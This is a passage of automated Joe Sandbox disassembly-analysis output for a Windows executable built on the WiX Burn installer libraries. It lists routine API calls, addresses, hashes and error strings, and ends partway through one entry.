                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-30613933
                                                                                                                                                                                                                                                                                                  • Opcode ID: f0d6aad6ca7e47593a9e6ec1bdea6f035387eadc6aec557c5b2b73479611bc91
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4af66722a677d7456ce3fd0e8c4945d7acd2637746414289002951345d5fd008
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0d6aad6ca7e47593a9e6ec1bdea6f035387eadc6aec557c5b2b73479611bc91
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501A232944129FBDF229F44CC09A9E3F64FF11769F1241A1FE14EA621C7369E109BD5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,00000000,?,0088D148,00000000), ref: 0088D16D
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0088D148,00000000), ref: 0088D179
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(008AB518,00000000,?,00000000,?,0088D148,00000000), ref: 0088D186
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0088D148,00000000), ref: 0088D193
                                                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(008AB4E8,00000000,?,0088D148,00000000), ref: 0088D1A2
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 260491571-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ed3d2f1509c239b0ee76b74cf5a3f2a554b10a7d773e2a775001c5f909c7920a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a5703adcbd574c669ee00caa7830ad6c1319bdcb5cf472125f82f8f4431f0c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed3d2f1509c239b0ee76b74cf5a3f2a554b10a7d773e2a775001c5f909c7920a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE01197A500B19EFCB31AFA6D984816F7E9FF50711315C93EE1A692971C371A880DF40
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7C74
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7C7F
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7C8A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: atomutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2724874077-4059165915
                                                                                                                                                                                                                                                                                                  • Opcode ID: 690939706b51570439be7c39204d8615e3e298428cd323a9d8b30349cec8783a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 17b8a1c96b87d8e8906138c9b30c84547fe8e3da25f81e87cb3666047e0cc20a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 690939706b51570439be7c39204d8615e3e298428cd323a9d8b30349cec8783a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B51717190422AAFEB21DB64CC44FAEB7B8FF05720F154194E905EB650D771ED00DBA1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008A8820
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A882A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                                                                                                                                                  • String ID: clbcatq.dll$timeutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2781989572-961924111
                                                                                                                                                                                                                                                                                                  • Opcode ID: ab7342b99fc25d73e4f30731cf0be2d143c6a438e47e2a57b6b589dfd87e955f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1255c4bc443792277bb5e85f737eff3a540dce759e3f10dc84005c4608cb753a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7342b99fc25d73e4f30731cf0be2d143c6a438e47e2a57b6b589dfd87e955f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4341C576E0021AE6EB24ABB88C45B7F7775FF52700FA54539A501E7690ED39CE0083B1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(000002C0), ref: 008A36E6
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A36F6
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 008A37D5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Variant$AllocClearInitString
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2213243845-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4946948c0c3db28115e18cb12567d254b4396bca3145d9bb9e21325146180b21
                                                                                                                                                                                                                                                                                                  • Instruction ID: e0a973d8f250c71bb65fd6c8b0bb29ad56e9ab382209df8f0ac824d7de523440
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4946948c0c3db28115e18cb12567d254b4396bca3145d9bb9e21325146180b21
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A34146B5900229AFDB119FA5C888EAABBA8FF06710F1541B5FD05EB611DA35DE008B91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00888E1B), ref: 008A0EAA
                                                                                                                                                                                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00888E1B,00000000), ref: 008A0EC8
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,00888E1B,00000000,00000000,00000000), ref: 008A0F1E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Enum$InfoQuery
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 73471667-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: bd6880cfe13fcee332793c06b55b3bc200036bd42ff0e9d773a31b29c6223ee3
                                                                                                                                                                                                                                                                                                  • Instruction ID: f0bc00e6de354ebde335782511aa7c6b350c55116870c9defb1d90bbc0c61a29
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd6880cfe13fcee332793c06b55b3bc200036bd42ff0e9d773a31b29c6223ee3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7931AF76D0152ABFFB218A84CC85EAFB66CFF05760F150065BD00FB650EB718E10AEA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7AF4
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 008A7AFF
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7B0A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: atomutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2724874077-4059165915
                                                                                                                                                                                                                                                                                                  • Opcode ID: c0a8bf8ab75018cd35515368331d318ccf744af7058dac4024af71df6b874029
                                                                                                                                                                                                                                                                                                  • Instruction ID: 703dcfe8417ca1c29609fada4cbd6fce1909cb44688eddda324a8b75cfc08742
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0a8bf8ab75018cd35515368331d318ccf744af7058dac4024af71df6b874029
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1319232D08539BBDB129B98CC45F9EBBA8FF02750F1101A5E900FB551D770AE01AB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00888E57,00000000,00000000), ref: 00888BD4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to initialize package from related bundle id: %ls, xrefs: 00888BBA
                                                                                                                                                                                                                                                                                                  • Failed to open uninstall key for potential related bundle: %ls, xrefs: 00888B43
                                                                                                                                                                                                                                                                                                  • Failed to ensure there is space for related bundles., xrefs: 00888B87
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-1717420724
                                                                                                                                                                                                                                                                                                  • Opcode ID: 912f4d6cf14c0fcd93e30ab3dc21386a3b00727ac282e036636b40715ddc4548
                                                                                                                                                                                                                                                                                                  • Instruction ID: f5589bddeb015ee0c73f1a1573f635bd9c25bde10e2034d08e53b13b6749ed47
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 912f4d6cf14c0fcd93e30ab3dc21386a3b00727ac282e036636b40715ddc4548
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF21BD7284061AFBDB12AE84CC46FEEBB69FB45320F504055F900E6290DB71AA20EB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,00861474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008613B8), ref: 00863B33
                                                                                                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,00861474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008613B8,000001C7,00000100,?,80004005,00000000), ref: 00863B3A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: HeapSize.KERNEL32(00000000,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BE2
                                                                                                                                                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 00863B86
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: memutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3406509257-2429405624
                                                                                                                                                                                                                                                                                                  • Opcode ID: bb2bae18f8ef9d6923076354cf61e27c5a9af70ea1e3b1c3537693fe2fbbcf34
                                                                                                                                                                                                                                                                                                  • Instruction ID: c786ce93fe9f2b3741eab2e729eb6093efcfc8b599f620a3a15332c421ec934c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb2bae18f8ef9d6923076354cf61e27c5a9af70ea1e3b1c3537693fe2fbbcf34
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE11DF31A04518ABDB226E6CDC48DAE3A5AFF41770B064224F815DB2A2DA36CF1097D1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A8991
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A89B9
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A89C3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastTime$FileSystem
                                                                                                                                                                                                                                                                                                  • String ID: inetutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1528435940-2900720265
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7476223869cf9eeb9e122783fd024db0be7d804c6279d84279e93de62667dd29
                                                                                                                                                                                                                                                                                                  • Instruction ID: 772a993b3a07d5da485e5b79d264a5a7035a9810f8418f365f4ee3679a4e891e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7476223869cf9eeb9e122783fd024db0be7d804c6279d84279e93de62667dd29
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B119A73901529A7E7209AA98C45BBFBFA8FB45750F010525AE41F7641E6349D0486F2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00873FB5,feclient.dll,?,00000000,?,?,?,00864B12), ref: 00873B42
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008A112B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008A1163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1586453840-3596319545
                                                                                                                                                                                                                                                                                                  • Opcode ID: cd3a1b350db154b58b93252f2236e243b9764021bd3bc15eb1d5a5f69e3422a2
                                                                                                                                                                                                                                                                                                  • Instruction ID: fa62441b3c42a54e6de42d3ffb2b20a158f50dba8665ba054c896ccc9b6719ab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd3a1b350db154b58b93252f2236e243b9764021bd3bc15eb1d5a5f69e3422a2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6411B932B40208BBEB21DB95DC46EBAB778FB15720F408065E505E7155D771DF81E711
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(008812CF,00000000,00000000,?,?,?,008A0013,008812CF,008812CF,?,00000000,0000FDE9,?,008812CF,8007139F,Invalid operation for this state.), ref: 008A0776
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,008A0013,008812CF,008812CF,?,00000000,0000FDE9,?,008812CF,8007139F), ref: 008A07B2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,008A0013,008812CF,008812CF,?,00000000,0000FDE9,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008A07BC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 606256338-3545173039
                                                                                                                                                                                                                                                                                                  • Opcode ID: c7cdbb0ec99734ad2f9575eb2b8b44ef29ddbbe8b36c9773f4e83c8508ceabf5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 672916f564413e5d1acf0243fa8d5840703362302f69c67daf8d342c2e0b29f5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7cdbb0ec99734ad2f9575eb2b8b44ef29ddbbe8b36c9773f4e83c8508ceabf5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06118A7294152DABA3109A69CD85EABBA6CFB46761B114224FD01E7740EB72ED00CDE0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0086523F,00000000,?), ref: 00861248
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0086523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00861252
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
